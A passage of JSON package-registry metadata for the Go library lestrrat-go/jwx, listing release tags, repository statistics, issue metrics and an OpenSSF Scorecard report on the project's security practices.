.2.1/manifests"},{"name":"v1.2.0","sha":"20fcd2aaea33121a0da375914a254615b3527c46","kind":"commit","published_at":"2021-04-29T23:40:49.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.0/manifests"},{"name":"v1.1.8-rc1","sha":"4fc7156e9562e4b51143220e830ed2d32279d2f6","kind":"commit","published_at":"2021-04-08T12:05:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.8-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.8-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.8-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.8-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.8-rc1/manifests"},{"name":"v1.1.7","sha":"db72eadbbe21fa7dc37d5628acfaa803fbf7d96e","kind":"commit","published_at":"2021-04-02T13:09:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7/manifests"},{"name":"v1.1.7-rc1","sha":"afd2d647f5892a70ab72ee14e9985ab5028bfb23","kind":"commit","published_at":"2021-03-31T06:49:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.7-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.7-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.7-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7-rc1/manifests"},{"name":"v1.1.6","sha":"df21963ac28051061a86f9c0e9671800312e6f18","kind":"commit","published_at":"2021-03-28T07:55:51.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"b2a7484c0e863f2730d3a7a79ade1deed9e85e13","kind":"commit","published_at":"2021-03-12T04:23:47.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5/manifests"},{"name":"v1.1.5-rc1","sha":"c9a7b177e98db06f4fcd57b90ddaeab8d436e0a9","kind":"commit","published_at":"2021-03-02T22:19:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.5-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.5-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.5-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5-rc1/manifests"},{"name":"v1.1.4","sha":"db48a5c54e2bf7d069a170de798d6bc914dae96d","kind":"commit","published_at":"2021-03-01T21:47:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"a7162536a2a50e66cc69bab0e4deb403e3f1fdc0","kind":"commit","published_at":"2021-02-22T08:42:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"a7f076fc6eadb44380d41b5e30eb5a85a91de864","kind":"commit","published_at":"2021-02-16T10:05:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"451a45cc212f752fa0011e64d8042ec87f0762df","kind":"commit","published_at":"2021-02-05T02:01:14.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"7f69ac971a6fd1cff28abadfe1e654f33004a19a","kind":"commit","published_at":"2021-01-31T07:52:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.0/manifests"},{"name":"v1.0.8","sha":"3bb9a18ceb5f45ffc4d0b837f85a5c3eb3f0bbfe","kind":"commit","published_at":"2021-01-14T23:41:30.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.8/manifests"},{"name":"v1.0.7","sha":"36d0cd5770ba08f66232bc143fd26856c258f27b","kind":"commit","published_at":"2021-01-11T10:52:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.7/manifests"},{"name":"v1.0.6","sha":"d4cb6651f457177451df330a37eaa0af4c7476a0","kind":"commit","published_at":"2020-12-16T21:36:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.6/manifests"},{"name":"v1.0.5","sha":"5aeabd78da3bab07a0ae04d299575f967590380e","kind":"commit","published_at":"2020-09-28T08:03:15.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"3d8cae88e8782b73d109e2cf66603b76826dd079","kind":"commit","published_at":"2020-08-14T13:41:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"3294517bae6989c5e89b00d0f72d79667d098942","kind":"commit","published_at":"2020-07-08T07:05:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.3/manifests"},{"name":"v1.0.2","sha":"d173045330f3e507d1d34b7fa622763dd744ecd6","kind":"commit","published_at":"2020-05-07T12:10:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"9969e2cb3255455a4a6b8a6da164bf80877155ef","kind":"commit","published_at":"2020-05-04T05:46:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5e17c3a031d6fb0962f929adcc3effc6dbb9f102","kind":"commit","published_at":"2020-05-03T03:30:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.0/manifests"},{"name":"v0.9.2","sha":"1402056cec6d7faba7454657f7bf180b2b1f14d5","kind":"commit","published_at":"2020-04-13T03:20:24.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"041c40732a8843e7d4a0b7cd2cffbe2f339f92ca","kind":"commit","published_at":"2020-02-26T22:25:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"5d60d87d07ddea9874404944870bec81aabcf574","kind":"commit","published_at":"2019-05-20T02:55:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-03-25T17:02:58.204Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":9.345852080216646,"dependent_packages_count":6.999148183520997,"stargazers_count":1.0929961382075044,"forks_count":1.4345083313038627,"average":4.718126183312252},"purl":"pkg:golang/github.com/lestrrat-go/jwx/internal/cmd/genreadfile","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/internal/cmd/genreadfile","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/internal/cmd/genreadfile","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/lestrrat-go/jwx/internal/cmd/genreadfile/dependencies","status":null,"funding_links":["https://github.com/sponsors/lestrrat"],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-23T10:02:05.442Z","issues_count":94,"pull_requests_count":747,"avg_time_to_close_issue":3354245.694117647,"avg_time_to_close_pull_request":304118.8680351906,"issues_closed_count":85,"pull_requests_closed_count":682,"pull_request_authors_count":27,"issue_authors_count":64,"avg_comments_per_issue":3.978723404255319,"avg_comments_per_pull_request":0.5903614457831325,"merged_pull_requests_count":577,"bot_issues_count":1,"bot_pull_requests_count":372,"past_year_issues_count":13,"past_year_pull_requests_count":196,"past_year_avg_time_to_close_issue":210964.44444444444,"past_year_avg_time_to_close_pull_request":191349.9512195122,"past_year_issues_closed_count":9,"past_year_pull_requests_closed_count":164,"past_year_pull_request_authors_count":10,"past_year_issue_authors_count":11,"past_year_avg_comments_per_issue":2.923076923076923,"past_year_avg_comments_per_pull_request":0.2857142857142857,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":80,"past_year_merged_pull_requests_count":143,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/issues","maintainers":[{"login":"lestrrat","count":345,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}],"active_maintainers":[{"login":"lestrrat","count":104,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Finternal%2Fcmd%2Fgenreadfile/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Finternal%2Fcmd%2Fgenreadfile/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Finternal%2Fcmd%2Fgenreadfile/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Finternal%2Fcmd%2Fgenreadfile/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Finternal%2Fcmd%2Fgenreadfile/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Finternal%2Fcmd%2Fgenreadfile/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2168948,"maintainers_count":0,"namespaces_count":792747,"keywords_count":113213,"github":"golang","metadata":{"funded_packages_count":53976},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-06-10T05:03:23.672Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":182,"name":"github.com/lestrrat-go/jwx/v2","ecosystem":"go","description":"Package jwx contains tools that deal with the various JWx (JOSE) technologies such as JWT, JWS, JWE, etc in Go.","homepage":"https://github.com/lestrrat-go/jwx","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/lestrrat-go/jwx","keywords_array":[],"namespace":"github.com/lestrrat-go/jwx","versions_count":32,"first_release_published_at":"2022-04-03T23:49:46.000Z","latest_release_published_at":"2025-04-29T08:17:11.000Z","latest_release_number":"v2.1.6","last_synced_at":"2026-06-13T02:12:33.697Z","created_at":"2022-04-04T17:16:11.268Z","updated_at":"2026-06-13T16:12:57.571Z","registry_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/v2","install_command":"go get github.com/lestrrat-go/jwx/v2","documentation_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/v2#section-documentation","metadata":{},"repo_metadata":{"id":37406150,"uuid":"45516769","full_name":"lestrrat-go/jwx","owner":"lestrrat-go","description":"Complete implementation of JWx (Javascript Object Signing and Encryption/JOSE) technologies for Go. #golang #jwt #jws #jwk #jwe","archived":false,"fork":false,"pushed_at":"2026-03-23T20:34:17.000Z","size":21587,"stargazers_count":2339,"open_issues_count":5,"forks_count":192,"subscribers_count":24,"default_branch":"develop/v3","last_synced_at":"2026-03-24T15:23:41.313Z","etag":null,"topics":["go","golang","jwe","jwk","jws","jwt","oidc"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/lestrrat-go.png","metadata":{"files":{"readme":"README.md","changelog":"Changes","contributing":".github/CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","dco":null,"cla":null},"funding":{"github":["lestrrat"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-11-04T05:12:52.000Z","updated_at":"2026-03-23T20:34:22.000Z","dependencies_parsed_at":"2023-09-23T13:31:33.054Z","dependency_job_id":"8122a1a4-053c-4ee5-9b97-9972c16335ef","html_url":"https://github.com/lestrrat-go/jwx","commit_stats":{"total_commits":1692,"total_committers":66,"mean_commits":"25.636363636363637","dds":0.3427895981087471,"last_synced_commit":"f0730766974533dcd9e5f8074a0adfcc471b0f0a"},"previous_names":["lestrrat/jwx"],"tags_count":106,"template":false,"template_full_name":null,"purl":"pkg:github/lestrrat-go/jwx","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/refs/heads/develop/v3","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/sbom","scorecard":{"id":371885,"data":{"date":"2025-08-11","repo":{"name":"github.com/lestrrat-go/jwx","commit":"568c2c84f11f47f53126b44bf3a3d76993038cba"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":6.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":0,"reason":"Found 0/23 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:28","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:29","Warn: no topLevel permission defined: .github/workflows/assign-issue.yml:1","Warn: no topLevel permission defined: .github/workflows/assign-pr.yml:1","Warn: no topLevel permission defined: .github/workflows/autodoc.yml:1","Warn: no topLevel permission defined: .github/workflows/benchmark.yml:1","Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Warn: no topLevel permission defined: .github/workflows/codeql.yml:1","Warn: no topLevel permission defined: .github/workflows/dependabot.yml:1","Warn: no topLevel permission defined: .github/workflows/lint.yml:1","Warn: no topLevel permission defined: .github/workflows/smoke.yml:1","Warn: no topLevel permission defined: .github/workflows/stale.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Pinned-Dependencies","score":6,"reason":"dependency not pinned by hash detected -- score normalized to 6","details":["Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/ci.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:47: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: goCommand not pinned by hash: .github/workflows/benchmark.yml:33","Warn: goCommand not pinned by hash: .github/workflows/ci.yml:36","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:42","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:44","Info:  15 out of  18 GitHub-owned GitHubAction dependencies pinned","Info:   4 out of   5 third-party GitHubAction dependencies pinned","Info:   2 out of   6 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection 